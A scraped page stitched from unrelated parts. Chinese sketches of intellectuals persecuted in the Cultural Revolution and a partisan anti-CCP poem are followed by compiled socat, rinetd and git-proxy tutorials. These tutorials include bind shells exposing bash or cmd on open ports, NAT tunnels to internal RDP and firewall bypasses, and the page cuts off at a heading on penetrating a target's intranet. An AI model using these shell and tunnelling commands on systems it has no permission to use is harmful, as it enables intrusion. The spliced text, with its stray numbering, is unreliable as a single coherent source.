毛泽东同乡,九三学社创始人之一,地理学家,中国地理“三杰”之一,被誉 为地学先师与泰斗,创办了多家大学的地理系,1966年8月被红卫兵抄家和残酷批斗,与妻子范雪茵一起自缢身亡。他是人文地理学家亨丁顿的弟子,美国多所 大学希望他留校,他拒绝并于1928年回国,1949年拒绝赴台。1952年知识份子改造时即受猛烈冲击,当时他曾说,不计较个人得失,只求能为祖国出 力,能去边远山区做地理教师也行,幸得竺可祯等人力保。
黄万里
黄万里手书遗言:“治江原是国家大事,蓄、拦、疏及挖四策中,各段仍应以堤防“拦”为主,为主。汉口段力求堤固。堤临水面宜打钢板桩,背水面宜以石砌,以策万全。盼注意,注意”,孤身一人反对建三门峡水电站,六次上书反对三峡工程的他,2001年8月27日去世。
唐士恒
广东中山人,国内最著名的妇产科专家之一,毕业于上海震旦大学,曾在比利时和德国深造,获医学博士学位,历任国内多家医院妇产科主任,在临床和科研方面均有极深造诣,文革中遭残酷迫害,1968年服毒自杀,年仅59岁。不知道迫害他的人当中,可有曾被他帮助的?

铁人王进喜
当年的大庆油田标兵,工人阶级英雄代表,1966年10月曾作为工人代表在天安门城楼上接受领袖检阅。回到大庆后不久被打成“政治大扒手”,屡遭批斗毒打,不给吃喝,被迫要吃屋檐上冻的冰棱子,后被救出,1970年去世。
钱钟书
谢泳曾记录,上世纪五十年代初,钱钟书调入毛选英译委员会,参与毛选英译工作,有人建议他把毛选拿回家去翻译,钱说:“这样肮脏的东西拿回家去,把空气都搞脏了”,后经人揭发,大受批判,钱从此一言不发。
梁思成
梁思成一心希望保护北京老城墙与老建筑,为此常在相关的国务院扩大会议上和吴□争吵,有一次,吴□站起来说:“您是老保守,将来北京城到处建起高楼大厦,您这些牌坊、宫门在高楼包围下岂不都成了鸡笼、鸟舍,有什么文物鉴赏价值可言”,气得梁思成当场痛哭。
盖叫天
京 剧艺术家,开创“盖派”。文革中被打成反动艺术权威,遭遇残酷迫害。当时他已年近八十,在一次残酷批斗中,造反派要求他下跪,他坚决不从,被几名壮汉掀翻 在地,用木杠压住双腿,二人各踩一头,强行拉扯上身,卡嚓一声将双腿压断。他和家人被赶出家门,所有积蓄珍藏被洗劫,几年后黯然离世。盖叫天病危时,家人 无钱,去文化局求救,造反派不理。家人无奈叫了辆三轮车送他到医院,司机听说是盖叫天就没要车钱。但他是牛鬼蛇神,医院不予治疗,只好送回栖身的小木屋, 随即去世。

青天白日旗永放光芒



1938 年,蒋中正亲临视察第五战区,并特意留下白崇禧为李宗仁出谋划策,将万余日军诱入重围之后聚歼。台儿庄战役是日本自明治维新以来遭受的首次大败,粉碎了自 抗战以来“皇军不可战胜”的神话,一扫因上海南京等地沦陷而笼罩在全国的悲观情绪,极大地鼓舞振奋了全国军民坚持抗战到底的信心。(点击观看记录片《一寸河山一寸血》—— 血战台儿庄 白崇禧助李宗仁获大捷

被誉为“小诸葛”,“战神”的白崇禧上将书法作品(网络图片)


青天白日旗永放光芒
青天白日旗飞扬,长照华夏放光芒。
长驱北伐军号响,金戈铁马震四方。
攘内安外清匪党,除暴安良换新装。
西安事变祸端起,灭共大计成泡汤。
抗日军兴炮声隆,国军血战显精忠。
蒋公统帅猛虎将,崇禧善战气如虹。
日寇投降万众喜,共匪作乱响枪声。
大陆沦陷千古恨,英雄末路走麦城。
光复大陆志不衰,台岛立足败犹荣。
红魔遭孽六十载,冤魂千万难超生。
多行不义必自毙,乌云散尽见天晴。
待到天灭中共日,中华复兴天地明。

(注释:白崇禧,字健生,北伐国军参谋总长,中华民国首任国防部长,抗日持久战最高战略制定者,国军多场重大战役策划部署指挥者,一级上将,军事家。)

储安平一语道破共匪天机,称中共“党天下”

储安平
国共内战时,储安平曾撰文批评国民党政府:“政府虽怕我们批评,而事实上我们现在连批评政府的兴趣也已没有 了”。1957年,储安平以《向毛主席和周总理提些意见》为题,批评政府已成一党天下。此文震动朝野,导致毛泽东“几天没睡好”。随后被打成右派,备受迫 害。文革时遭摧残后失踪,至今未摘右派帽子储安平曾说:自由,对于过去的国民党蒋介石来说,是多或少的问题;对于共产党毛泽东来说,则是有或无的问题。可 看得如此透彻,终不免于难。储安平在文中认为“党领导国家并不等于这个国家即为党所有,大家拥护党,但并没忘了自己也还是这个国家的主人……无论大小单 位,都要安排一个党员做头儿,事无钜细都要看党员的颜色行事,都要党员点了头才算数,这样的做法,是不是太过了”。 党天下事件后,储安平遭遇围攻,其长子也被迫在报上公开与之划清界限。1982年,统战部确认失踪16年的他已经死亡。1998年出版的《储安平文集》仍 有诸多删减。
金岳霖
“建国”后的大师金岳霖,从不问政治转向参政,忏悔录和检讨一篇接一篇,把自己骂得狗血淋 头,一度成为知识份子自我改造的代表。他曾写:“我培养了不关心政治甚至反动的人。如殷海光,他现在在台湾为蒋匪帮服务”,“我宣传逻辑上的纯技术观点, 在这方面我捧王浩,他现在仍留在美国为美帝国主义服务”。
马思武
著名音乐家马思聪的二哥。早年留学法国,后为 法语教授。1967年,马思聪无法忍受运动中的批斗迫害,秘密逃离中国,其亲戚朋友均受株连迫害。1968年“清阶”运动中,马思武被指控曾帮马思聪“投 敌”,一日在学校中被批斗殴打,折磨到深夜11点,第二天跳楼身亡。其法国夫人也离开中国,两年后去世。

周寿宪
1951 年(26岁)在美国获博士学位,并留美从事研究工作,1955年冲破阻挠回国,任职于清华,参与筹建计算机专业,是我国计算机科学的创建人之一。文革中被 送到江西鲤鱼洲清华五七干校,被长期摧残后患上精神病,但军宣队员说他是装的,常拳打脚踢谩骂侮辱,后因病情严重送回北京,1976年跳楼自杀。
李丕济
1912 年生,水利专家。早年留学德国,后任清华大学水利系教授,主编《水力学》教材,还为多座大型水库做水工模型试验,对1949年后的国家水利建设贡献颇大。 文革清阶运动时被残酷批斗,关押于水利馆大楼,1968年11月29日跳楼自杀。另外,当时水利馆里的重要科研设备仪器等均被砸毁,档案资料被烧。

How to use git over an HTTP proxy with socat/socat 端口转发设置及使用

    How to use git over an HTTP proxy, with socat
            a word about socat
            proxying the git protocol
            proxying the ssh protocol
                ssh proxy using corkscrew instead of socat
                extra coolness for github
Corporate firewalls and proxy typically block both of these (and often a lot more); here's how to get around them.
If you're tracking a public repo, you will need to use the "git" protocol, because the "http" protocol is not very efficient, and/or requires some special handling on the server side. If you're pushing code to a public repo, you definitely need to use the "ssh" protocol.

a word about socat

I will be using "socat", an absolute corker of a program that does so many things it's incredible! Other people use corkscrew, ssh-https-tunnel, etc., which are all specialised for just one purpose. I prefer socat, and once you spend the 2-3 years :-) needed to read the man page, you will see why!
The basic idea is that you will somehow invoke socat, which will negotiate with the HTTP(S) proxy server using the CONNECT method to get you a clean pipe to the server on the far side.
However, do note that socat does have one disadvantage: the passwords to your proxy server are visible in to local users running ps -ef or something. I don't care since I don't have anyone else logging into my desktop, and the ability to use a program I already have anyway (socat) is more important.

proxying the git protocol

When I want to download a public repo, I just type
proxied_git clone ...repo...
proxied_git pull
and so on, instead of
git clone ...repo...
git pull
Here's the how and why of it.
To proxy the git protocol, you need to export an environment variable called GIT_PROXY_COMMAND, which contains the command that is to be invoked. I have a shell function in my .bashrc that looks like this:
proxied_git () 
( 
    export GIT_PROXY_COMMAND=/tmp/gitproxy;

    cat  > $GIT_PROXY_COMMAND <<EOF
#!/bin/bash
/usr/bin/socat - PROXY:172.25.149.2:\$1:\$2,proxyport=3128
EOF
    chmod +x $GIT_PROXY_COMMAND;

    git "$@"
)
Possible variations are:
  • you could give /tmp/gitproxy a more permanent name and remove the middle pararaph completely. I don't do this because that's too small a file to bother with; it just seems cleaner this way)
  • you could permanently set the environment variable if all your git repos are remote (very unlikely)
One thing you cannot do is to roll the entire socat command into the environment variable. Git passes the host and port as two arguments to the proxy command, but socat expects them in the syntax you see above, so you will need to wrap it in a script as I have done. I guess you could argue that this is a point in favour of corkscrew etc. ;-)

proxying the ssh protocol

The git protocol is handled directly by git (duh!), but if you use the ssh protocol, it invokes ssh explicitly (again, duh!).
Ssh already has this sort of stuff built-in, so you simply add a few lines to your ~/.ssh/config
host gh
    user git
    hostname github.com
    port 22
    proxycommand socat - PROXY:your.proxy.ip:%h:%p,proxyport=3128,proxyauth=user:pwd
Now you can just say (for example):
git clone gh:sitaramc/git-notes.git

ssh proxy using corkscrew instead of socat

  • download and install corkscrew (http://www.agroman.net/corkscrew/)
  • create a file (eg., ~/.ssh/myauth) and put your http proxy username and password as "username:password" in it and save it.
  • safeguard the file
    chmod 600 ~/.ssh/myauth
    
  • open ~/.ssh/config and add the following entry, adding an explicit path to corkscrew if needed.
    host gh
        user git
        hostname github.com
        port 22
        proxycommand corkscrew your.proxy.ip 3128 %h %p ~/.ssh/myauth
    

extra coolness for github

Noting that many corporate firewalls block access to the CONNECT method on ports other than 443, the good folks at github have an ssh server listening on 443 if you use the host "ssh.github.com", so you can replace the hostname and the port in the above ssh config stanza as appropriate, and you're all set.
from http://sitaramc.github.com/tips/git-over-proxy.html
------------------------------------------------------------------------------

socat 端口转发设置及使用


背景:在服务器上面需要设置端口转发,当然使用nc也可以做到,但是发现socat更加方便而且,听说更牛,实际两个对比我是没有搞懂。主要是看那个方便使用。在网络上找来几篇文章,然后整理出来给大家参考。我对这个软件运用比较少,有问题可以互相交流。
*
【正文开始】
文章类型:网络收集整理,半原创 :)
适合人群:通过socat端口转发,设置NAT转发双向流,寻找比NC更强大的人
知识背景:基本软件安装,网络端口相关知识有一定的了解
*

0、基本介绍

socat是一個netcat(nc)的替代產品,可以稱得上nc++。socat的特點就是在兩個流之間建立一個雙向的 通道。socat的地址類型很 多,有ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl,,其实发现socat的参数也是很有规律、简洁的。
socat 可以在任意的两个(广义的)管道(socket,标准输入输出流,管道等)之间建立一个通道,在该通道中交换两端的数据。

1、安装方法

Debian\Ubuntu : sudo apt-get install socat
CentOS\Redhat:yum install socat
其他的Linux: 点击这个 下载链接 下载源码编译吧。

2、使用方法

例如,我需要的转发功能是:
对于所有15000端口的TCP访问,一律转发到 server.wesnoth.org:15000 上。
于是,对应的命令就是:
socat -d -d -lf /var/log/socat.log TCP4-LISTEN:15000,reuseaddr,fork,su=nobody TCP4:server.wesnoth.org:15000
“-d -d -lf /var/log/socat.log”是参数,前面两个连续的-d -d代表调试信息的输出级别,-lf则指定输出信息的保存文件。
“TCP4-LISTEN:15000,reuseaddr,fork,su=nobody”是一号地址,代表在15000端口上进行TCP4协议的监听,复用绑定的IP,每次又连接到来就fork复制一个进程进行处理,同时将执行用户设置为nobody用户。
“TCP4:server.wesnoth.org:15000″是二号地址,代表将socat监听到的任何请求,转发到server.wesnoth.org:15000上去。
下面的例子需要认真去理解里面表达的意思,假设要转发端口就要先在本地打开一个端口,然后再监听提供给外部连接的端口。
$socat – tcp:192.168.1.18:80
這個命令等同於 nc 192.168.1.18 80。 socat裡面,必須有兩個流,所以第一個參數-代表標準的輸入輸出,第二個流連接到192.168.1.18的80端口。再看一個反向telnet的例子:
on server:
$socat tcp-listen:23 exec:cmd,pty,stderr
這個命名把cmd綁定到端口23,同時把cmd的Stderr重定向到stdout。
on client:
$socat readline tcp:server:23
連接到服務器的23端口,即可獲得一個cmd shell。readline是gnu的命令行編輯器,具有歷史功能。
再看文件傳遞的例子。nc也經常用來傳遞文件,但是nc有一個缺點,就是不知道文件什麼時候傳完了,一般要用Ctrl+c來終止,或者估計一個時間,用-w參數來讓他自動終止。用socat就不用這麼麻煩了:
on host 1:
$socat -u open:myfile.exe,binary tcp-listen:999
on host 2:
$socat -u tcp:host1:999 open:myfile.exe,create,binary
這個命令把文件myfile.exe用二進制的方式,從host 1 傳到host 2。-u 表示數據單向流動,從第一個參數到第二個參數,-U表示從第二個到第一個。文件傳完了,自動退出。
再來一個大家喜歡用的例子。在一個NAT環境,如何從外部連接到內部的一個端口呢?只要能夠在內部運行socat就可以了。
外部:
$socat tcp-listen:1234 tcp-listen:3389
內部:
$socat tcp:outerhost:1234 tcp:192.168.12.34:3389
這樣,你外部機器上的3389就影射在內部網192.168.12.34的3389端口上。

3、参考资料

《 使用socat进行端口转发》
Port Forwarding in user space [INFO]》
How to forward port in user space using socat

from http://www.issacy.com/archives/807.html
----------------------------------------------------

socat - Multipurpose relay

Abstract

what: "netcat++" (extended design, new implementation)
OS:   AIX, BSD, HP-UX, Linux, Solaris e.a. (UNIX)
lic:  GPL2
inst: tar x...; ./configure; make; make install
doc:  README; socat.html, socat.1; xio.help
ui:   command line
exa:  socat TCP6-LISTEN:8080,reuseaddr,fork PROXY:proxy:www.domain.com:80
keyw: tcp, udp, ipv6, raw ip, unix-socket, pty, pipe, listen, socks4, socks4a,
      proxy-connect, ssl-client, filedescriptor, readline, stdio,
      exec, system, file, open, tail -f, termios, setsockopt, chroot,
      fork, perm, owner, trace, dump, dgram, ext3, resolver, datagram,
      multicast, broadcast, interface, socket, sctp, generic, ioctl

What's new?

2012/05/14: A heap based buffer overflow vulnerability has been found with data that happens to be output on the READLINE address. Successful exploitation may allow an attacker to execute arbitrary code with the privileges of the socat process (advisory). Fixed versions are 1.7.2.1 and 2.0.0-b5. Patches are available in the download area.
2011/12/05: socat version 1.7.2.0 allows tun/tap interfaces without IP address and introduces options openssl-compress and max-children. It fixes 18 bugs and has 11 changes for improved platform support, especially for Mac OS X Lion, DragonFly, and Android.
2011/05/29: Michael Terzo provided a patch that fixes the compile error of socat 2.0.0 up to b4 on non-Linux systems.
2010/10/03: Vitali Shukela provided a patch that allows to use the original target address of an accepted connection in a socks or proxy address.
2010/08/02: A stack overflow vulnerability has been fixed that could be triggered when command line arguments were longer than 512 bytes. Fixed versions are 1.7.1.3 and 2.0.0-b4. See socat security advisory 2 for details.
2009/04/04: the third beta version (2.0.0-b3) of socat version 2 is ready for download. It contains all new bug fixes and features of 1.7.1.0 (plus fix:setenv, see below) and introduces the possibility to integrate external programs in address chains (see doc/socat-addresschain.html and doc/socat-exec.html).
2008/11/01: a public git repository containing socat 1.6.0.0 and all later releases is available.

Get it!

You can download socat 1.7.2.0 in source form (.gz.bz2). Feel free to check the md5 hashes.
Many actual Linux and BSD distributions already provide socat; for other distributions and for some commercial UNIX platforms, precompiled socat packages are available too, so search the internet if you dont´t want to bother with compiling it yourself.
There is a page with socat patches and contributions.
socat binaries for Windows based on Cygwin are provided by Gentil Kiwi for download.

Documentation

Classical documentation:


Mini tutorials:


Contact

If you have more questions, please contact socat@dest-unreach.org

from http://www.dest-unreach.org/socat/
-------

socat的主要特点就是在两个数据流之间建立通道;且支持众多协议和链接方式:ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl,socket等。
socat是一个多功能的网络工具,名字来由是” Socket CAT”,可以看作是netcat的N
倍加强版,socat的官方网站:http://www.dest-unreach.org/socat/ 。
安装步骤:
1.解压
2.   ./configure 
3.   make && make install
    编译时出现:
    gcc -O -D_GNU_SOURCE -Wall -Wno-parentheses  -DHAVE_CONFIG_H -I.  -I.   -c -o nestlex.o nestlex.c
nestlex.c:14:7: error: unknown type name ‘ptrdiff_t’
       ptrdiff_t *len, 后面还有很多

解决办法:
vim nestlex.c 添加在头部 #include "stddef.h" 保存
在编译

如果出现:    
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13

解决方法有两种:
第一种是禁用fips,使用如下命令配置:
./configure –disable-fips
第二种是安装fips,首先到网站http://www.openssl.org/source/ 下载openssl-fips安装包,然后解压安装:
./configure
make && make install
socat使用:
    工作原理:
    四个阶段:
        初始化:解析命令行以及初始化日志系统
        打开连接:先打开第一个连接,再打开第二个连接,是单步执行的,第一个失败,直接退出
        数据转发:谁有数据就转发到另外一个连接上,read/write互换
        关闭:其中一个连接掉开,执行处理另外一个连接关闭


3.2 地址类型 
参数由2部分组成,第一个连接和第二个连接,最简单的用法就是 socat - - 其效果就是输入什么,回显什么其用法主要在于地址如何描述, 下面介绍几个常用的。 
3.2.1 TCP 
TCP:<host>:<port> 目标机器host对应端口portTCP-LISTEN:<port> 本机监听端口。 
3.2.2 UDP 
UDP:<host>:<port> 目标机器host对应端口portUDP-LISTEN:<port> 本机监听端口。 
3.2.3 OPENSSL 
需要一个证书,否则会失败提示: 2012/04/06 11:29:11 socat[1614] E SSL_connect(): 
error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failureOPENSSL:<host>:<port> 目标机器host
对应端口
portOPENSSL-LISTEN:<port> 本机监听端口。 
3.2.4 TUN 
TUN[:<if-addr>/<bits>] 建立vpn,双方都需要root权限。 

3.3 典型使用 
3.3.1 连接目标 
socat - tcp:192.168.1.18:80 
这个命令等同于 nc 192.168.1.18 80。 socat里面,必须有两个流,所以第一个参数-代表标准的输入输出,第二个流连接到192.168.1.18的80端口。 
socat -d -d READLINE,history=$HOME/.http_history TCP4:www.qq.com:80 
这个例子支持历史记录查询,类似于bash的历史记录。 
3.3.2 反向连接 
再看一个反向telnet的例子: on server: 
socat tcp-listen:23 exec:cmd,pty,stderr 
这个命名把cmd绑定到端口23,同时把cmd的Stderr复位向到stdout。 on client: 
socat readline tcp:server:23 
连接到服务器的23端口,即可获得一个cmd shell。readline是gnu的命令行编辑器,具有历史功能。 
3.3.3 向远处端口发数据 
echo “test” | socat – tcp-connect:127.0.0.1:12345 
3.3.4 本地开启端口 
socat tcp-l:7777,reuseaddr,fork system:bash 
同nc -l -p 7777 -e bash。 
3.3.5 执行bash的完美用法 
在目标上 
socat tcp-l:8888 system:bash,pty,stderr 
本地 
socat readline tcp:$target:8888readline替代-,就能支持历史功能了。在这个模式下的客户端有本地一样的效果 

3.3.6 文件传递 
再看文件传递的例子。nc也经常用来传递文件,但是nc有一个缺点,就是不知道文件什么时候传完了,一般要用Ctrl+c来终止,或者估计一个时间,用-w参数来让他自动终止。用socat就不用这么麻烦了: 
on host 1: 
socat -u open:myfile.exe,binary tcp-listen:999 
on host 2: 
socat -u tcp:host1:999 open:myfile.exe,create,binary 
这个命令把文件myfile.exe用二进制的方式,从host 1 传到host 2。-u 表示数据单向流动,从第一个参数到第二个参数,-U表示从第二个到第一个。文件传完了,自动退出。 

3.3.7 转发 

3.3.7.1 本地端口转向远程主机 
socat TCP4-LISTEN:8888 TCP4:www.qq.com:80 
如果需要使用并发连接,则加一个fork,如下: 
socat TCP4-LISTEN:8888,fork TCP4:www.qq.com:80 
本地监听8888端口,来自8888的连接重定向到目标www.qq.com:80 
3.3.7.2 端口映射 
再来一个大家喜欢用的例子。在一个NAT环境,如何从外部连接到内部的一个端口呢?只要能够在内部运行socat就可以了。 
外部: 
socat tcp-listen:1234 tcp-listen:3389 
内部: 
socat tcp:outerhost:1234 tcp:192.168.12.34:3389 
这样,你外部机器上的3389就映射在内部网192.168.12.343389端口上。 

3.3.7.3 VPN 
服务端 
socat -d -d TCP-LISTEN:11443,reuseaddr TUN:192.168.255.1/24,up 
客户端 
socat TCP:1.2.3.4:11443 TUN:192.168.255.2/24,up 

3.3.8 重定向 
socat TCP4-LISTEN:80,reuseaddr,fork TCP4:192.168.123.12:8080 
TCP4-LISTEN:在本地建立的是一个TCP ipv4协议的监听端口; reuseaddr:绑定本地一个端口; 
fork:设定多链接模式,即当一个链接被建立后,自动复制一个同样的端口再进行监听 
socat启动监听模式会在前端占用一个shell,因此需使其在后台执行。 
socat -d -d tcp4-listen:8900,reuseaddr,fork tcp4:10.5.5.10:3389 # 端口转发 
或者 
socat -d -d -lf /var/log/socat.log TCP4-LISTEN:15000,reuseaddr,fork,su=nobody TCP4:static.5iops.com:15000 
“-d -d -lf /var/log/socat.log”是参数,前面两个连续的-d -d代表调试信息的输出级别,-lf则指定输出信息的保存文件。 
“TCP4-LISTEN:15000,reuseaddr,fork,su=nobody”是一号地址,代表在15000端口上进行TCP4协议的监听,复用绑定的IP,每次有连接到来就fork复制一个进程进行处理,同时将执行用户设置为nobody用户。 
“TCP4:static.5iops.com:15000″是二号地址,代表将socat监听到的任何请求,转发到static.5iops.com:15000上去。 

3.3.9 读写分流 
socat还具有一个独特的读写分流功能,比如: 
socat open:read.txt!!open:write.txt,create,append tcp-listen:80,reuseaddr,fork 
这个命令实现一个假的web server,客户端连过来之后,就把read.txt里面的内容发过去,同时把客户的数据保存到write.txt里面。”!!”符号用户合并读写流,前面的用于读,后面的用于写。 

3.3.10 通过openssl来加密传输过程 

3.3.10.1 
证书生成 
FILENAME=server openssl genrsa -out $FILENAME.key 1024openssl req -new -key $FILENAME.key -x509 -days 3653 -out 
$FILENAME.crtcat 
$FILENAME.key 
$FILENAME.crt >$FILENAME.pem 
在当前目录下生成 server.pem server.crt
3.3.10.2 使用 
在服务端 
socat openssl-listen:4433,reuseaddr,cert=srv.pem,cafile=srv.crt system:bash,pty,stderr 
在本地 
socat readline openssl:localhost:4433,cert=srv.pem,cafile=srv.crt 
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • 66
  • 67
  • 68
  • 69
  • 70
  • 71
  • 72
  • 73
  • 74
  • 75
  • 76
  • 77
  • 78
  • 79
  • 80
  • 81
  • 82
  • 83
  • 84
  • 85
  • 86
  • 87
  • 88
  • 89
  • 90
  • 91
  • 92
  • 93
  • 94
  • 95
  • 96
  • 97
  • 98
  • 99
  • 100
  • 101
  • 102
  • 103
  • 104
  • 105
  • 106

apt-get install socat nohup

nohup socat TCP4-LISTEN:2333,reuseaddr,fork TCP4:233.233.233.233:6666 >> /root/socat.log 2>&1 &
nohup socat UDP4-LISTEN:2333,reuseaddr,fork UDP4:233.233.233.233:6666 >> /root/socat.log 2>&1 &

其中 TCP4/UDP4-LISTEN: 处填写转发服务器(即本机)的端口,TCP4/UDP4: 处填写被转发服务器的 IP 和对应被转发端口(即 SS 服务器)

设置完成后把 SS 的客户端的 服务器地址 和 端口 改为国内转发服务器对应的 IP 和端口即可

开机自启:
chmod +x /etc/rc.d/rc.local
vi /etc/rc.d/rc.localfrom https://blog.csdn.net/w3045872817/article/details/78235917
---------------------------

Linux上的实用的端口转发工具:socat安装/使用记录


写在前面:

在实际生产中我们经常会遇到到一个场景就是,用一台机器作为转发服务器,连接AB两个网段,将转发服务器的某个端口上的流量转发到B网段的某台机器的某个端口,这样A网段的服务器就可以通过访问转发服务器上的端口访问到B网段的服务器端口。
这样的场景一般在和客户建立专线的连接时候经常用到,一般也可以采用iptables做转发,但是比较复杂,socat可以很轻松的完成这个功能。
socat可以看做netcat(nc)的替代产品,作用是在两个流之间建立双向的通道,且支持众多协议和链接方式:ip,tcp,udp,ipv6,pipe,exec,system,open,proxy,openssl,socket等

一、socat的安装方式:

1.源码方式安装: 

socat的官方网站:http://www.dest-unreach.org/socat/
socat源代码包下载地址:http://www.dest-unreach.org/socat/download/ 
编译安装:
# tar zxf  socat-1.7.2.4.tar.gz
# cd  socat-1.7.2.4
# ./configure   
# make   
# make install  

2.yum方式安装:

# yum install socat

二、主要功能

1.端口转发功能:

格式:
# nohup socat TCP4-LISTEN:访问端口reuseaddr,fork TCP4:192.168.xxx.xxx:转发端口
实例:
开启日志,在本地的监听192.168.162.43网卡的123端口,并将请求转发至192.168.162.44的123端口
# nohup socat  -d -d -lf /var/log/socat.log TCP4-LISTEN:188,bind=192.168.162.43,reuseaddr,fork TCP4:192.168.162.44:123 &
nohup...& :  这个是保证命令可以在后台运行
-d -d -lf /var/log/socat.log :  前面两个连续的-d -d代表调试信息的输出级别,-lf则指定输出信息的保存文件。 
TCP4-LISTEN:在本地建立的是一个TCP ipv4协议的监听端口;
bind:指定监听的IP地址,不写这个参数的话将监听服务器上的全部IP
reuseaddr:绑定本地一个端口
fork:设定多链接模式,即当一个链接被建立后,自动复制一个同样的端口再进行监听

2.文件传递功能:

nc也经常用来传递文件,但是nc有一个缺点,就是不知道文件什么时候传完了,一般要用Ctrl+c来终止,或者估计一个时间,用-w参数来让他自动终止。用socat就不用这么麻烦: 
192.168.162.43: 
# socat -u open:file,binary tcp-listen:123 
 
192.168.162.44: 
# socat -u tcp:192.168.162.43:123 open:file,create,binary 
-u 表示数据单向流动,这个命令把文件file用二进制的方式,使用123端口(不能是已使用的端口),从192.168.162.43传到192.168.162.44,文件传输完毕,会自动退出。 

3.读写分流功能: 

socat还具有一个独特的读写分流功能,比如: 
# socat open:read.txt!!open:write.txt,create,append tcp-listen:80,reuseaddr,fork 
这个命令实现一个假的web server,客户端连过来之后,就把read.txt里面的内容发过去,同时把客户的数据保存到write.txt里面。”!!”符号用户合并读写流,前面的用于读,后面的用于写。

from http://www.jiagoumi.com/work/1500.html
--------------

rinetd、socat端口转发部署


端口转发映射的程序叫rinetd,下载地址,直接manke编译安装即可。
[root@PortForward02 src]# wget http://www.boutell.com/rinetd/http/rinetd.tar.gz
[root@PortForward02 src]# ls
rinetd.tar.gz
[root@PortForward02 src]# tar -zxvf rinetd.tar.gz 
[root@PortForward02 src]# cd rinetd 
[root@PortForward02 rinetd]# make
cc -DLINUX -g   -c -o rinetd.o rinetd.c
rinetd.c:176: warning: conflicting types for built-in function ‘log’
cc -DLINUX -g   -c -o match.o match.c
gcc rinetd.o match.o -o rinetd
[root@PortForward02 rinetd]# make install
install -m 700 rinetd /usr/sbin
install -m 644 rinetd.8 /usr/man/man8
install: cannot create regular file `/usr/man/man8': No such file or directory
make: *** [install] Error 1
[root@PortForward02 rinetd]#
运行make可能会出现错误,需如下修改,将rinetd.c文件中bindPort >= 65536和connectPort >= 65536修改为65535,不然在make的时候会提示超出系统最大定义端口,按n可以查找下一处
[root@PortForward02 rinetd]# vim rinetd.c 
 544                         if ((bindPort == 0) || (bindPort >= 65535)) {
  567                         if ((connectPort == 0) || (connectPort >= 65535)) {
 或者
 [root@localhost rinetd]# sed -i "s/35536/35535/g" rinetd.c
手动建目录/usr/man/
[root@PortForward02 rinetd]# mkdir -p /usr/man/
[root@PortForward02 rinetd]# make clean
[root@localhost rinetd]# make 
cc -DLINUX -g   -c -o rinetd.o rinetd.c
rinetd.c:176: warning: conflicting types for built-in function ‘log’
cc -DLINUX -g   -c -o match.o match.c
gcc rinetd.o match.o -o rinetd
[root@localhost rinetd]# make install
install -m 700 rinetd /usr/sbin
install -m 644 rinetd.8 /usr/man/man8
[root@localhost rinetd]#
成功后会提示文件路径
install -m 700 rinetd /usr/sbin
install -m 644 rinetd.8 /usr/man/man8
程序路径/usr/sbin/rinetd
建立配置文件/etc/rinetd.conf,内容格式:源IP 源端口 要跳转的IP 要跳转的端口;在每一单独的行中指定每个要转发的端口。源地址和目的地址都可以是主机名或IP 地址,IP 地址0.0.0.0 将rinetd 绑定到任何可用的本地IP地址上:
例如将所有发往本机80端口的请求转发到192.168.4.247的80端口
[root@localhost rinetd]# vim /etc/rinetd.conf
allow 10.15.44.162                //设置允许访问的ip地址信息
# allow 0.0.0.0
#allow 10.15.44.*
#deny 10.15.44.144
0.0.0.0 8090 10.15.44.133 80      //设置端口转发
logfile /var/log/rinetd.log        //设置打印的log
启动程序并将rinetd加入开机启动
[root@PortForward02 rinetd]# /usr/sbin/rinetd 
或者
[root@localhost rinetd]# rinetd -c /etc/rinetd.conf 
[root@localhost rinetd]# netstat -antulp|grep -i rinetd
tcp        0      0 0.0.0.0:8090                0.0.0.0:*                   LISTEN      5849/rinetd         
[root@localhost rinetd]# killall -9 rinetd  或者pkill -9 rinetd
[root@localhost rinetd]# netstat -antulp|grep -i rinetd
[root@localhost rinetd]# rinetd 
[root@localhost rinetd]# netstat -antulp|grep -i rinetd
tcp        0      0 0.0.0.0:8090                0.0.0.0:*                   LISTEN      5861/rinetd               
[root@PortForward02 rinetd]# cat /etc/rc.d/rc.local |grep -v "#"
/usr/sbin/rinetd -c /etc/rinetd.conf
touch /var/lock/subsys/local
[root@PortForward02 rinetd]#
这样的话只要在任意浏览器访问:http://10.15.44.125:8090(rinetd服务器地址)就和访问http://10.15.44.133同样的效果。但是这个只能在10.15.44.162机器上实现,其他机器就不行,如果
注意事项
1. rinetd.conf中绑定的本机端口必须没有被其它程序占用
2. 运行rinetd的系统防火墙应该打开绑定的本机端口
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 2222 -j ACCEPT
3.不支持FTP的跳


socat作用是在两个流之间建立双向的通道,且支持众多协议和链接方式:ip,tcp,udp,ipv6,pipe,exec,system,open,proxy,openssl,socket等
yum 方式安装:
wget –no-cache http://www.convirture.com/repos/definitions/rhel/6.x/convirt.repo -O /etc/yum.repos.d/convirt.repo
yum makecache
yum install socat
使用方式:
nohup socat tcp-l:外部访问端口,reuseaddr,fork tcp:192.168.xxx.xxx:内部转发端口
nohup  socat TCP4-LISTEN:188,reuseaddr,fork TCP4:192.168.1.22:123 &
在本地监听188端口,并将请求转发至192.168.1.22的123端口
TCP4-LISTEN:在本地建立的是一个TCP ipv4协议的监听端口;
reuseaddr:绑定本地一个端口;
fork:设定多链接模式,即当一个链接被建立后,自动复制一个同样的端口再进行监听
socat启动监听模式会在前端占用一个shell,因此需使其在后台执行。
附:socat官方文档:http://www.dest-unreach.org/socat/doc/socat.html
from http://blog.51cto.com/ityunwei2017/1621753
---------


如何利用 socat 更方便地穿透目标内网

0x01 此次环境说明:
1
2
3
lnmp01 假设为目标DMZ段机器,等会儿会作为proxy
